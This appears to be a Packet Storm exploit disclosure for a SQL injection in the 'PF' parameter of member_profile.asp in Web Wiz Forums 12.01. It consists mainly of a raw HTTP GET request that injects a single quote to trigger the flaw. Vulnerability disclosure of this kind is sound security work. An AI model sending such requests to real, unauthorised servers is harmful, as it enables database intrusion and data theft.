Web Wiz Forums version 12.01 suffers from a remote SQL injection vulnerability.
1e9f9930685a5a4348dc658eaee7c81ad478d99eb6ce3f7e83e84ae6fc6a1a43# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
# Date: 2019-09-16
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
# Version: 12.01
# Tested on Windows
# Vulnerable parameter: PF (member_profile.asp)
# GET Request
GET /member_profile.asp?PF=10' HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
Connection: close
Upgrade-Insecure-Requests: 1
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed